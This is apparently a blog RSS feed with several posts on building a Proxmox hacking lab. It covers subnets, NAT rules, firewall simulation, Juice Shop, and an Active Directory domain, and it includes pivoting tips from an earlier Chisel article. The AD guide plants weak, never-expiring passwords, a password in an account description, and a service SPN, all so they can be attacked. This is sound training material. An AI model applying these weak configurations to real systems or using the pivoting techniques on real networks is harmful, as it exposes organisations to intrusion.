As we wrap up this insightful journey into the world of network pivoting, let&apos;s take a moment to appreciate the rich tapestry of techniques and tools we&apos;ve explored. Chisel, a true star in our toolkit, has shown its prowess in tunneling TCP/UDP traffic with remarkable ease, reinforcing its place as a must-have in any cybersecurity enthusiast&apos;s arsenal.

Our dive into the lab setup illuminated the critical role of a well-structured environment. It&apos;s a playground where theories transform into tangible skills, a space where the abstract notions of network security are brought to life.

From the intricacies of local and remote port forwarding to the dynamic realm of SOCKS proxies, we&apos;ve seen how diverse the world of pivoting can be. Each method, with its unique flavor, serves as a testament to the ever-evolving landscape of network security.

Our practical applications using SSH, WINRM, and the versatile Chisel not only bridged the gap between theory and practice but also painted a picture of real-world network navigation. It&apos;s a reminder of the constant dance between offensive and defensive strategies in the cybersecurity realm.

As we conclude, let&apos;s cherish this knowledge that arms us with the ability to navigate and penetrate complex network environments. This chapter is more than just a learning experience; it&apos;s a stepping stone to the vast, unexplored territories of advanced network penetration techniques.

So, as we close this chapter, let&apos;s not just walk away with new skills but also with an invigorated passion to delve deeper, explore further, and keep the flame of curiosity alive in the ever-exciting world of network security. Happy pivoting, and see you in the next adventure!

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is chisel and what is its main purpose?&lt;/summary&gt;

Chisel is a tool that works in a client/server model that will allow us to create network tunnels to access the internal network from a machine that we have previously compromised.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main difference between remote port forwarding and local port forwarding ?&lt;/summary&gt;

The main difference between local port forwarding and remote port forwarding in SSH is the direction of traffic flow: local port forwarding redirects traffic from the local machine to the remote server, while remote port forwarding redirects traffic from a remote machine to the local machine via the SSH server.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main advantage of remote port forwarding?&lt;/summary&gt;

The main advantage of remote port forwarding is that, since the direction of traffic is from the victim machine to the client, it makes it easier to bypass mechanisms that provide protection such as firewalls.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What facilitates the use of dynamic port forwarding?&lt;/summary&gt;

When using dynamic port forwarding, thanks to a SOCKS server, we were able to access all the services to which the compromised machine had access. This means that, for example, we can access ssh or RDP services of machines in the internal network to which we did not have access before in a more comfortable way.
&lt;/details&gt;

# Resources

[GitHub - t3l3machus/pentest-pivoting: A compact guide to network pivoting for penetration testings / CTF challenges.](https://github.com/t3l3machus/pentest-pivoting)</content:encoded><author>Ruben Santos</author></item><item><title>Building an Adaptable Hacking Lab: Subnets, Static IPs, and Services</title><link>https://www.kayssel.com/post/lab-3</link><guid isPermaLink="true">https://www.kayssel.com/post/lab-3</guid><description>This article covers setting up subnets, static IPs, firewalls in Proxmox, and configuring Windows, Kali, Ubuntu servers. It includes Docker setup for web service deployment, creating a versatile cybersecurity lab environment.</description><pubDate>Fri, 22 Sep 2023 13:00:54 GMT</pubDate><content:encoded># Introduction: Crafting a Versatile Cybersecurity Lab in Proxmox

Welcome back to our series on building a dynamic hacking lab with Proxmox! After a brief hiatus, we&apos;re diving deeper into the nuances of lab setup to enhance your cybersecurity practice. This chapter is all about expanding your lab&apos;s capabilities, focusing on advanced network configurations and service deployment techniques.

We&apos;ll explore the intricacies of subnet creation and management within Proxmox, ensuring your lab&apos;s network is both structured and versatile. This includes assigning static IPs to machines and understanding the significance of subnets in controlled network environments.

Furthermore, we delve into the world of traffic redirection and Internet access management for subnets, using tools like iptables for effective network routing. This is crucial for simulating real-world network scenarios and for practicing various network-based attacks and defenses.

Our journey also takes us through the practical application of Proxmox firewalls. Here, you&apos;ll learn to simulate internal network conditions, a skill essential for internal penetration testing and pivoting exercises.

Additionally, we&apos;ll set up an Ubuntu server with essential services like SSH and web applications using Docker. This not only adds another layer to your lab but also provides a sandbox for practicing web hacking techniques, a critical skill in the arsenal of any cybersecurity enthusiast.

By the end of this chapter, you&apos;ll have a comprehensive lab environment. It&apos;s not just a playground for Active Directory hacking but a versatile space for practicing a wide array of cybersecurity skills, from network pivoting to web application penetration testing. Let&apos;s get started and expand the horizons of your cybersecurity lab!

# Envisioning Our Lab: A Networked Realm for Diverse Cybersecurity Practices

![](/content/images/2023/09/imagen-1.png)

Hacking Lab

  
As we embark on the setup of our Proxmox-based cybersecurity lab, let&apos;s conceptualize the network layout and its intended functionalities. Our lab will feature two primary network segments, each serving distinct purposes and hosting different sets of machines.

1.  **The External Network**: This segment forms the backbone of our lab. Here, we will host our Kali Linux machine, an essential tool for penetration testing and cybersecurity analysis. Alongside Kali, this network will house the majority of our Active Directory machines. This external setup mirrors a typical organizational network, providing a realistic environment for a broad range of cybersecurity exercises, from network scanning to Active Directory exploitation.
2.  **The Internal Network**: This is where our lab&apos;s complexity and versatility truly shine. Within this segment, we will have a dedicated Active Directory machine, &quot;PC-Beru&quot; in our case, which enjoys exclusive access to this internal realm. This segregation makes &quot;PC-Beru&quot; a critical pivot point for practicing advanced techniques like network pivoting and lateral movement.
3.  **The Beru-Internal Machine**: As a specialized component of our internal network, the &quot;Beru-Internal&quot; machine is designated for hosting various web services. This setup allows us to delve into web application hacking techniques, providing a safe and controlled environment to test vulnerabilities and defensive strategies in web-based applications.

With this tripartite network structure, our lab evolves into a comprehensive training ground, catering to a wide spectrum of cybersecurity practices. From the basics of network penetration testing with Kali Linux to the complexities of internal network exploitation and web application security, our lab is poised to offer a rich learning experience. Let&apos;s dive in and bring this cyber training arena to life!

# Setting Up Subnets in Proxmox: A Practical Guide

Embarking on our network customization journey in Proxmox, we&apos;re going to establish subnets that are both functional and pivotal for our lab setup. Let&apos;s start by creating these subnets: we navigate to &quot;pve -&gt; Network&quot; and select the option to create a new &quot;Linux Bridge&quot; network. Here, we&apos;ll define our subnet details.

![](/content/images/2023/09/Pasted-image-20230908083008.png)

Selection of &quot;Network Device&quot;

![](/content/images/2023/09/Pasted-image-20230908083334.png)

Set up subnet

For instance, I&apos;ve set up a subnet as &quot;192.168.254.100/24,&quot; designating &quot;192.168.254.100&quot; as the gateway. Next, we&apos;ll replicate this process for the internal network, creating the &quot;192.168.253.100/24&quot; subnet. After configuring these subnets, don&apos;t forget to click &quot;Apply Configuration&quot; to save the changes.

![](/content/images/2023/09/Pasted-image-20230908083407.png)

Apply Configuration

  
Now, while our subnets exist, they lack internet connectivity. To remedy this, we need to input some crucial code into our server&apos;s /etc/network/interfaces file. This code, accessible through the pve shell, includes commands for IP forwarding and iptables rules for NAT (Network Address Translation). These iptables commands are critical for masquerading, which lets guests with private IP addresses access the network using the host&apos;s IP address for outgoing traffic.

Here&apos;s a snapshot of the code you&apos;ll need:

```bash
 post-up echo 1 &gt; /proc/sys/net/ipv4/ip_forward
 post-up iptables -t nat -A POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
 post-down iptables -t nat -D POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
 post-up iptables -t nat -A POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE
 post-down iptables -t nat -D POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE

```

![](/content/images/2023/09/imagen-2.png)

Proxmox network configuration

In essence, these commands enable our subnets to route traffic via the vmbr0 interface, which possesses internet access. Once you&apos;ve added these settings, you can restart the server or execute `ifreload -a` to apply these changes. This step ensures that our newly established subnets have access to the internet, bringing us a step closer to a fully functional lab environment.

# Configuring the Domain Controller in Proxmox for a New Subnet

Transitioning the domain controller to fit into our newly created subnet in Proxmox involves a few precise steps. Here’s a straightforward guide to get your domain controller rightly configured:

**Navigate to Network Settings**: Start by accessing the &quot;hardware&quot; tab of your domain controller in Proxmox. Here, you&apos;ll find the network device settings of the machine.

![](/content/images/2023/09/Pasted-image-20230913092215.png)

Change network interface to use

  
**Switch Network Bridge**: Change the network bridge from vmbr0 to vmbr1. This action relocates your domain controller to the new subnet we&apos;ve set up earlier.

![](/content/images/2023/09/Pasted-image-20230909175915.png)

Change network interface to use the new subnetwork

**Assign a Static IP**: Now, it&apos;s time to ensure your domain controller has a fixed IP within the new subnet. To do this, go to the &quot;Network and Sharing Center&quot; on your domain controller. Look for &quot;Ethernet instance 0&quot; and access its properties.

![](/content/images/2023/09/Pasted-image-20230909180739.png)

Selection of &quot;Ethernet Instance 0&quot;

**Set the IP Address**: In the &quot;Internet Protocol Version 4&quot; settings, assign the desired static IP address. This step is crucial as it defines the domain controller&apos;s position within the subnet&apos;s IP range.

![](/content/images/2023/09/Pasted-image-20230914082550.png)

Properties

  

![](/content/images/2023/09/Pasted-image-20230909180653.png)

Configure the domain controller&apos;s static IP address

**Verify Internet Connectivity**: After configuring the static IP, ensure that the domain controller has Internet access. If the subnets are correctly configured, your domain controller should seamlessly connect to the Internet.

![](/content/images/2023/09/imagen-3.png)

We see that we have internet connection

# Configuring Windows Machines for Dual Subnet Access in Proxmox

Setting up Windows machines in Proxmox to access both internal (vmbr2) and external (vmbr1) networks is a multi-step process that involves network device configuration and IP settings. Here’s how to do it:

**Network Device Addition**: In Proxmox, select your Windows machine and navigate to the Network settings. Use the &quot;Add&quot; button to introduce a new network device, enabling access to the second subnet.

![](/content/images/2023/09/imagen-4.png)

Add a new network device

  
**Assigning to Subnets**: Configure the newly added network device for the internal network (vmbr2). This setup ensures the Windows machine can access both the internal and external networks, making it pivotal for network pivoting exercises.  

![](/content/images/2023/09/imagen-5.png)

Select vmbr2 for the second interface

**First Network Device Configuration**: The first network device should be set to the external network (vmbr1). This arrangement allows the machine to communicate with other devices on the external network.

![](/content/images/2023/09/imagen-7.png)

Select vmbr1 from the first interface

**DNS Configuration**: On the first Ethernet setting in Windows, ensure the DNS is set to the IP of your domain controller. This step is crucial for the machine to recognize and interact with the domain established in your lab.

![](/content/images/2023/09/imagen-8.png)

Change adapter options

![](/content/images/2023/09/imagen-9.png)

Instances that we have previously configured

![](/content/images/2023/09/imagen-10.png)

Static IP configuration of Windows machine of the first interface

**Second Network Interface Setup**: Configure the second network interface with an appropriate static IP but leave the gateway field blank. This omission prevents network conflicts with the first interface.

![](/content/images/2023/09/imagen-12.png)

Static IP configuration of Windows machine of the second interface

**Final Verification**: After completing these configurations, verify that the Windows machine has access to both the Internet and the domain. Successful access indicates a correct setup and readiness for network-related exercises, including pivoting.

![](/content/images/2023/09/imagen-13.png)

We see that we have both internet and domain access

# Configuring Kali Linux in Proxmox for External Network Access

Setting up Kali Linux for external network access in Proxmox is a straightforward process, primarily focusing on the network interface configuration. Here&apos;s a step-by-step guide:

**Select Network Interface**: In Proxmox, choose the Kali Linux machine and navigate to its network settings. Select the option to place the machine on the external network, which is usually denoted as vmbr1 in Proxmox.

![](/content/images/2023/09/imagen-14.png)

Select the external network interface

  
**Modify Network Configuration File**: Access the Kali Linux machine and open the `/etc/network/interfaces` file. This file contains the configuration for network interfaces.

**Static IP Configuration**: Edit the file to set a static IP address for the primary network interface (typically `eth0`). For example:

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ cat /etc/network/interfaces   
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
 address 192.168.253.128
 netmask 255.255.255.0
 gateway 192.168.253.100

```

This configuration assigns a static IP (192.168.253.128) to Kali Linux, with the appropriate netmask and gateway settings for external network access.

**Restart for Changes to Take Effect**: Once the configuration file is updated, restart the Kali Linux machine to apply the new network settings.

# Setting Up an Ubuntu Server in Proxmox for Internal Network Simulation

To simulate that we have a computer in the internal network, let&apos;s create an Ubuntu Server machine that has web and ssh services. Here are a couple of screenshots of the configuration that I have done:

  
**Initial Setup and Configuration**: In Proxmox, create a new virtual machine and choose Ubuntu Server as the operating system. Configure the general options, OS, system, disk, CPU, memory, and importantly, set the network to connect to your internal network (typically vmbr2 in Proxmox).

![](/content/images/2023/09/imagen-16.png)

General options

![](/content/images/2023/09/image-6.png)

OS options

![](/content/images/2023/09/image-7.png)

System options

![](/content/images/2023/09/image-8.png)

Disks options

  

![](/content/images/2023/09/image-9.png)

CPU options

![](/content/images/2023/09/image-10.png)

Memory options

![](/content/images/2023/09/image-25.png)

Network options (vmbr2)

![](/content/images/2023/09/image-11.png)

Confirm the creation of the virtual machine

**Language and Keyboard Configuration**: Start the Ubuntu Server machine and select the preferred system and keyboard language during the initial setup process.

![](/content/images/2023/09/image-12.png)

Language selection

![](/content/images/2023/09/image-13.png)

Keyboard selection

**Network Configuration**: Assign a static IP address to the Ubuntu Server to ensure it resides within your internal subnet. This step is crucial for the server to have Internet access and to be reachable within the internal network.

![](/content/images/2023/09/image-14.png)

Network configuration

**Default File System and Disk Space**: Proceed with the default file system setup and allocate the required disk space for the server.

![](/content/images/2023/09/image-15.png)

Default file system

![](/content/images/2023/09/image-16.png)

File system data

**User Creation and Machine Naming**: Create a primary user for the server and set a hostname for easy identification within the network.

![](/content/images/2023/09/image-17.png)

User configuration

  
**Installing OpenSSH**: During the setup process, select the option to install OpenSSH. This allows for remote access to the server via SSH, which is essential for managing the server and deploying services.

Complete the installation process, and once the server is up and running, verify that it has proper connectivity to both the internal network and the Internet.

### Firewall Configuration: Simulating an Internal Network

Creating an effective internal network simulation involves utilizing Proxmox&apos;s firewall capabilities. Start by navigating to &quot;Firewall -&gt; Options&quot; in Proxmox and switch the firewall setting from &quot;No&quot; to &quot;Yes&quot;. This change sets the stage for more specific network control.

![](/content/images/2023/09/image-18.png)

Enable the firewall

Next, dive into the rule creation process by adding new rules. The first rule is designed to block all TCP traffic originating from the external network, specifically the 192.168.253.0/24 subnet. This rule is crucial for ensuring that only desired traffic reaches our internal network.

![](/content/images/2023/09/image-19.png)

Deny inbound TCP traffic

  
In addition to the TCP traffic block, implement a rule to deny ICMP traffic. This step further tightens our network&apos;s security, preventing standard ping requests from reaching the internal network.

![](/content/images/2023/09/image-20.png)

Deny inbound ICMP traffic

After establishing these rules, the Proxmox firewall section should display the configurations clearly, signifying the successful implementation of your firewall settings.

![](/content/images/2023/09/image-21.png)

Firewall control panel

  
To confirm the effectiveness of these firewall rules, conduct a simple test. Try pinging from the Kali machine to the Ubuntu machine, both with and without the ICMP rule activated. This test will demonstrate the firewall&apos;s impact on network traffic. Additionally, verify that the Windows machine, which is connected to both the internal and external networks, has proper access as expected. This comprehensive approach ensures your internal network simulation is functioning as intended, providing a realistic environment for network management and security testing.

### Docker Installation and Configuration for Web Services

With the firewall configured, our next step is to install Docker on the Ubuntu machine. Docker simplifies the process of deploying various services. For a streamlined installation, use the script available on GitHub, specifically designed for Docker installation.

GitHub Repository: [Docker/docker-install](https://github.com/docker/docker-install) This repository provides an automated Docker installation script, making the setup process more efficient.

Post-installation, ensure your user has the necessary permissions to deploy containers by adding them to the Docker group. Execute the following command:

```bash
sudo usermod -aG docker $USER

```

After adding the user to the Docker group, reboot the system to apply the changes.

Now, let&apos;s deploy a web service for practicing web hacking techniques. For this tutorial, we&apos;ll use &quot;Juice Shop,&quot; a deliberately vulnerable web application. Install and run Juice Shop using the following Docker commands:

```bash
docker pull bkimminich/juice-shop`
docker run --rm -p 3000:3000 bkimminich/juice-shop

```

![](/content/images/2023/09/image-22.png)

Downloading juice-shop

  

![](/content/images/2023/09/image-23.png)

Execution of the container

These commands pull the Juice Shop image from Docker Hub and run it on port 3000. With Juice Shop up and running, you should be able to access it from the Windows machine within your network. If necessary, like in this scenario, you can temporarily disable the TCP firewall rule to test access from other machines, such as Kali Linux.

![](/content/images/2023/09/image-24.png)

Page accessed from Kali

This setup provides a practical environment to hone your web hacking skills, using Juice Shop as a safe, legal platform for testing and learning. Remember, you can install other web hacking labs on this machine to diversify your practice scenarios.

# Conclusion: Building a Comprehensive Lab for Diverse Cybersecurity Practices

In this guide, we&apos;ve taken significant strides in creating a robust, versatile cybersecurity lab within Proxmox. Our journey included configuring subnets to ensure network segmentation and implementing static IP assignments across various machines. This setup not only aids in organizing our lab but also plays a crucial role in network management and security.

The introduction of firewall rules in Proxmox was a crucial step. It not only provided an additional layer of security but also enabled us to simulate more realistic network environments. These environments are essential for practicing advanced cybersecurity techniques like pivoting and internal network attacks.

The installation and configuration of Docker on Ubuntu added another dimension to our lab, allowing for the deployment of various services with ease. By setting up Juice Shop, we created an environment to practice web hacking safely and legally, an invaluable resource for sharpening penetration testing skills.

This comprehensive setup, encompassing both Active Directory hacking and web application vulnerabilities, paves the way for a well-rounded cybersecurity practice. Whether you&apos;re honing your skills in network pivoting, exploring web vulnerabilities, or testing Active Directory attacks, this lab provides a solid foundation for a wide range of cybersecurity exercises.

As we progress, the lab will continue to evolve, adapting to new challenges and techniques in the ever-changing landscape of cybersecurity. Happy hacking!

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What do I have to do in proxmox if I want my subnets to have internet access ?&lt;/summary&gt;

```bash
 post-up echo 1 &gt; /proc/sys/net/ipv4/ip_forward
        post-up iptables -t nat -A POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
        post-down iptables -t nat -D POSTROUTING -s &apos;192.168.253.0/24&apos; -o vmbr0 -j MASQUERADE
        post-up iptables -t nat -A POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE
        post-down iptables -t nat -D POSTROUTING -s &apos;192.168.254.0/24&apos; -o vmbr0 -j MASQUERADE

```

I have to redirect the traffic of the subnets created by the interface that does have access to Ethernet. In the above example, it would be **vmbr0.** In order to perform this action, I have to make use of iptables to raise network rules that allow me to forward traffic so that the machine works as if it were a router.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do I have to do to make a machine belong to a new subnet?&lt;/summary&gt;

First, I have to select in the Proxmox network configuration of the machine that I want to use the network interface corresponding to the subnet where I want to add it.

![](/content/images/2023/09/image-28.png)

Once this is done, I have to statically configure the IP of the machine. On Windows machines this is done through the network configuration menus, while on Linux machines it is mostly done in /etc/network/interfaces.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can I simulate a private network in a simple way?&lt;/summary&gt;

I can make use of the Proxmox Firewall to create different firewall rules that allow me to choose which traffic I want to reach a certain machine. For example, I can create rules that deny TCP traffic to a certain subnet or ICMP traffic, thus making other machines unable to ping.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can I install docker in a simple way in linux and what do I have to do so that my user can create containers without being root ?&lt;/summary&gt;

I can use the following script to automate the installation of docker:I can use the following script to automate the installation of docker:

[GitHub - docker/docker-install: Docker installation script](https://github.com/docker/docker-install)

On the other hand, for my user to be able to run containers without being root, I have to add him to the docker group. I can do this with the following command:On the other hand, for my user to be able to run containers without being root, I have to add him to the docker group. I can do this with the following command:

```bash
sudo usermod -aG docker $USER

```
&lt;/details&gt;

# Resources

[Network Configuration - Proxmox VE](https://pve.proxmox.com/wiki/Network_Configuration)</content:encoded><author>Ruben Santos</author></item><item><title>Configuring a Proxmox-Based Hacking Lab: Active Directory and Windows Setup</title><link>https://www.kayssel.com/post/lab-2</link><guid isPermaLink="true">https://www.kayssel.com/post/lab-2</guid><description>In this chapter, we finalize driver setups for Windows in Proxmox and configure an Active Directory for practice attacks. We cover driver installation, domain controller setup, certificate services, user creation, and SMB enablement, preparing a complete hacking lab environment.</description><pubDate>Fri, 08 Sep 2023 12:29:12 GMT</pubDate><content:encoded># Kicking Off: Advancing Your Hacking Lab with Proxmox and Active Directory

Welcome back! After a brief summer hiatus, I&apos;m excited to dive back into our series on crafting a hacking lab with Proxmox. This chapter marks a significant leap forward as we delve into the final touches on Windows machine driver configurations and embark on setting up a fully operational Active Directory environment. This setup is not just about technical configuration; it&apos;s a playground for honing your skills in a variety of attacks seen in the Active Directory series.

In this installment, we&apos;ll tackle the intricacies of Active Directory configurations, from driver installations to domain controller setups. We&apos;ll walk through each step methodically, ensuring you have a solid understanding of the process and its importance in a simulated attack environment. This guide is designed to be your roadmap for creating a realistic and functional Active Directory domain within Proxmox, where you can safely practice and master numerous attack strategies.

Whether you&apos;re refining your skills or just starting, this chapter is crafted to enhance your understanding and execution of complex network setups. So, with the previous article as our foundation, let&apos;s embark on this journey to build a robust and versatile hacking lab. Let&apos;s get started!

# Configuring Drivers on Your Domain Controller: A Step-by-Step Guide

Our journey continues from where we left off in the first article. Upon logging into our domain controller, we&apos;re greeted with the familiar Server Manager interface. If you&apos;ve reached this stage without a hitch, it&apos;s time to get those drivers up and running.

![](/content/images/2023/09/Pasted-image-20230831083549.png)

Server Manager interface

Let&apos;s navigate to &quot;This PC,&quot; where we&apos;ll delve into its properties and access the device manager. Here, you&apos;ll likely spot three devices flagged with issues. Fear not - let&apos;s tackle them one by one.

![](/content/images/2023/09/Pasted-image-20230831083850.png)

Select &quot;Device Manager&quot;.

![](/content/images/2023/09/Pasted-image-20230831083929.png)

Displays of the three devices giving errors

## **Updating the First Device**

## Right-click on the first device with an error.Choose &apos;Update driver,&apos; then &apos;Browse my computer for driver software,&apos; and finally hit &apos;Browse.&apos;Hunt down the version of your operating system and select the &apos;amd64&apos; folder. This should get the internet connection driver up and running smoothly.

![](/content/images/2023/09/Pasted-image-20230831084204.png)

Selection of driver for internet connection

![](/content/images/2023/09/Pasted-image-20230831084228.png)

Driver successfully installed

## **Addressing the Remaining Devices:**

The process for the other two devices is similar but with a slight tweak. This time, head straight to the &apos;D:&apos; drive, which houses the necessary drivers.

![](/content/images/2023/09/Pasted-image-20230831084948.png)

Install the rest of the devices starting from the &quot;D:&quot; drive

  
With all drivers functioning, our path is clear to proceed with the Active Directory setup. Remember, this driver configuration is a must-do for every Windows machine in your domain.

# **Active Directory Configuration: Building Your Digital Fortress**

Before we dive into the nitty-gritty of Active Directory setup, here’s a quick tip: If you’re locked out and facing the &apos;ctrl+alt+delete&apos; prompt, a simple click on the screen lock unlocking button (as shown below) will set you free.

![](/content/images/2023/09/image.png)

Screen lock unlocking

## Domain controller

Start by giving your machine a personalized touch with a new name. Choose a theme close to your heart - be it Marvel, Star Wars, or anything else. Head over to &apos;view your PC name&apos; and select &apos;Rename this PC&apos; to christen your domain controller.

![](/content/images/2023/09/image-1.png)

Search for the option to rename the machine

![](/content/images/2023/09/Pasted-image-20230831085639.png)

Change machine name

### Installation of active directory functionalities

Post-renaming and a quick reboot, reopen &apos;Server Manager.&apos; From here, click &apos;Manage,&apos; followed by &apos;Add roles and features.&apos;

![](/content/images/2023/09/image-2.png)

Add roles and Features

Progress through the steps until you reach the &apos;Active Directory Domain Services&apos; selection. Add this feature and march towards the end of the installation.

![](/content/images/2023/09/Pasted-image-20230831090550.png)

Active Directory Domain Services

![](/content/images/2023/09/Pasted-image-20230831090719.png)

Completion of installation

## **Elevating to a Domain Controller**

  
Once the installation wraps up, click on &apos;Promote this server to a domain controller.&apos;

![](/content/images/2023/09/Pasted-image-20230831090914.png)

Promote this server to a domain controller

  
Input your chosen domain name, ensuring it ends with &apos;.local.&apos; Opt for &apos;Add new forest&apos; and proceed to set your administrative password.

![](/content/images/2023/09/Pasted-image-20230831091008.png)

Domain name configuration

![](/content/images/2023/09/Pasted-image-20230831091042.png)

Forest name configuration

![](/content/images/2023/09/Pasted-image-20230831091129.png)

Restoration service configuration

  
Follow through with the setup steps until you hit the final install prompt. A machine reboot is on the cards post-installation

![](/content/images/2023/09/Pasted-image-20230831091400.png)

Completoin of the configuration

### Certificate Service

  
Back in the Server Manager, it&apos;s time to add the certificate service, crucial for launching LDAPs and IPv6 attacks. Repeat the &apos;Add roles and features&apos; steps, but this time, select &apos;Active Directory Certificate Services&apos; and add the required features.

![](/content/images/2023/09/Pasted-image-20230901080254.png)

Installation of &quot;Active Directory Certificate Services&quot;

  
We will continue until we get to the confirmation section where we will check the box indicated in the following image and then proceed with the installation.

![](/content/images/2023/09/Pasted-image-20230901080431.png)

Completion of the installation

Post-installation, configure the certificate service, opting for &apos;Certification Authority&apos; under &apos;Role Service.&apos; Set a generous &apos;Validity Period&apos; of 99 years (who knows how long your lab will be operational!), and finalize the setup with a &apos;Configure&apos; click and a machine restart.

![](/content/images/2023/09/Pasted-image-20230901080600.png)

Certificate service configuration

![](/content/images/2023/09/Pasted-image-20230901080650.png)

Certification Authority

![](/content/images/2023/09/Pasted-image-20230901080751.png)

Validity period

![](/content/images/2023/09/Pasted-image-20230901080829.png)

Final configuration

### User creation

With the essential setup done, let&apos;s populate our domain with users. Navigate to &apos;Tools&apos; and select &apos;Active Directory Users and Computers.&apos;

![](/content/images/2023/09/Pasted-image-20230901081048.png)

Active Directory Users and Computers

Organize by creating a new &apos;Groups&apos; organizational unit. Migrate all objects except &apos;Administrator&apos; and &apos;Guest&apos; from the &apos;Users&apos; unit into this new group.

![](/content/images/2023/09/Pasted-image-20230901081243.png)

Creation of new organizational unit

![](/content/images/2023/09/Pasted-image-20230901081303.png)

&quot;Groups&quot; unit

![](/content/images/2023/09/Pasted-image-20230901081352.png)

Copy all the groups to their corresponding unit

![](/content/images/2023/09/Pasted-image-20230901081430.png)

Organized User unit

Now, for the fun part - creating a new user. Right-click in the Users unit, select &apos;New -&gt; User,&apos; and fill in the details. Choose a memorable logon name and a not-so-secure password for easy attack practice. Make sure the password doesn’t expire too often for convenience.

![](/content/images/2023/09/Pasted-image-20230901081628.png)

User creation interface

![](/content/images/2023/09/Pasted-image-20230901081737.png)

Setting the password to never expire

To simulate a common enterprise scenario, create a service account, like a SQL account, using your first user as a template.

![](/content/images/2023/09/Pasted-image-20230901081908.png)

We use the user created as a template

![](/content/images/2023/09/Pasted-image-20230901082031.png)

SQL Service user created

Add a password hint in the description as a nod to common administrative oversights.

![](/content/images/2023/09/Pasted-image-20230901082148.png)

User description with password

  
Promote this account to a service account using the &apos;setspn&apos; tool via CMD.

```bash
setspn -a DC-SHADOW/SQLService.SHADOW.local:60111 SHADOW\SQLService

```

![](/content/images/2023/09/Pasted-image-20230901082447.png)

Make SQL account Service account

  
To verify that it has been successfully created, we can use the following command:

```bash
setspn -T SHADOW.local -Q */*

```

![](/content/images/2023/09/Pasted-image-20230901082632.png)

Show all service accounts

### Shared folder setup

Setting up SMB is crucial for various reconnaissance and attack practices. Start by creating a &apos;Resources&apos; shared folder on the C drive.

![](/content/images/2023/09/Pasted-image-20230901082814.png)

Creation of the &quot;Resources&quot; shared folder

  
Head to &apos;File and Storage Services&apos; in the Server Manager and opt to create a new folder.

![](/content/images/2023/09/Pasted-image-20230901082851.png)

File and Storage Services

  
Here, in &quot;Tasks&quot; we will select that we want to create a new folder.  

![](/content/images/2023/09/Pasted-image-20230901082929.png)

Creation of new folder

  
In this configuration screen the only thing we will have to do is to specify the location of the folder we have just created in &quot;Share location&quot;.  

![](/content/images/2023/09/Pasted-image-20230901083012.png)

Sharing folder path

![](/content/images/2023/09/Pasted-image-20230901083042.png)

Selection of previously created folder

Once this is done, we will continue until the configuration is complete.

![](/content/images/2023/09/Pasted-image-20230901083150.png)

Continue until the configuration is complete

This is all for the basic configuration of the domain controller, now we will move on to the Windows machines that you want to join the domain.

# **Prepping Windows Machines for Domain Integration**

  
Continuing with our detailed guide, let&apos;s focus on preparing each computer for domain integration. This process is essential for all machines you plan to include in your domain. Here&apos;s how you can seamlessly integrate them:

**Renaming Your Computer:**

1.  Start by giving each computer a unique identifier that aligns with your domain&apos;s theme or preference.
2.  Locate the &apos;Rename your PC&apos; option in the Windows search bar. This simple step allows you to personalize each machine, making it easier to distinguish them within your network.
3.  After selecting an appropriate name, proceed through the prompts and complete the process with a system restart.

![](/content/images/2023/09/Pasted-image-20230901083902.png)

Change of machine name

## Setting up the DNS for Machine Integration into the Domain

To integrate your machine into the newly created domain, it&apos;s crucial to configure its Domain Name System (DNS) settings. This step is pivotal in ensuring seamless communication between your machine and the domain controller.

Begin by opening the Windows Internet settings. Here, navigate to &quot;Change adapter options&quot; to modify network configurations.

![](/content/images/2023/09/Pasted-image-20230901084104.png)

Internet settings

### **Configuring DNS**

Dive into the settings of Ethernet instance 0. Look for &apos;Properties&apos; and then select &quot;Internet Protocol Version 4 (TCP/IPv4)&quot;.

![](/content/images/2023/09/Pasted-image-20230901084203.png)

Access to the IPv4 configuration of the computer

In the DNS section, you&apos;ll need to input the IP address of your domain controller. This is the central hub of your network, and directing your machine to communicate with it is essential for successful domain integration.

![](/content/images/2023/09/Pasted-image-20230901084439.png)

Configure the DNS with the IP of the domain controller

To retrieve the IP address of your domain controller, use the `ipconfig` command in the Command Prompt (CMD) on the domain controller itself.  

![](/content/images/2023/09/Pasted-image-20230901084257.png)

IP of the domain controller

  
Once your DNS settings are in place, test the configuration. A simple yet effective way to do this is by pinging the domain you&apos;ve established. This will confirm whether your machine is correctly recognizing and communicating with the domain controller.

![](/content/images/2023/09/Pasted-image-20230901084551.png)

A sign that we have reached the domain

## Joining a Machine to Your Domain: Simplified Steps

To integrate a machine into your domain, the process is quite straightforward. Begin by searching for &quot;Access work or school&quot; in the Windows search bar. Inside, you&apos;ll find a &quot;Connect&quot; option, kicking off the configuration journey. Here, select &quot;Join this device to local Active Directory domain&quot; to proceed.

![](/content/images/2023/09/Pasted-image-20230901084637.png)

Search for &quot;Access Work or school&quot;

![](/content/images/2023/09/image-3.png)

Option to connect to an active directory

![](/content/images/2023/09/Pasted-image-20230901084704.png)

Join this device to a local Active Directory domain

Next, you&apos;ll be prompted to enter your domain name. This is the identity of your domain you established earlier.

![](/content/images/2023/09/Pasted-image-20230901084727.png)

Enter our domain name

After inputting the domain name, you&apos;ll need to authenticate. Enter the credentials of your domain administrator user, finalizing the connection of the machine to your domain.

![](/content/images/2023/09/Pasted-image-20230901084758.png)

Enter domain administrator&apos;s credentials

![](/content/images/2023/09/Pasted-image-20230901084829.png)

Add the account

Once these steps are completed, and if everything goes as planned, your newly added computer should proudly appear in the &quot;Computers&quot; unit of your domain controller, signifying a successful integration into your domain.

![](/content/images/2023/09/Pasted-image-20230901084933.png)

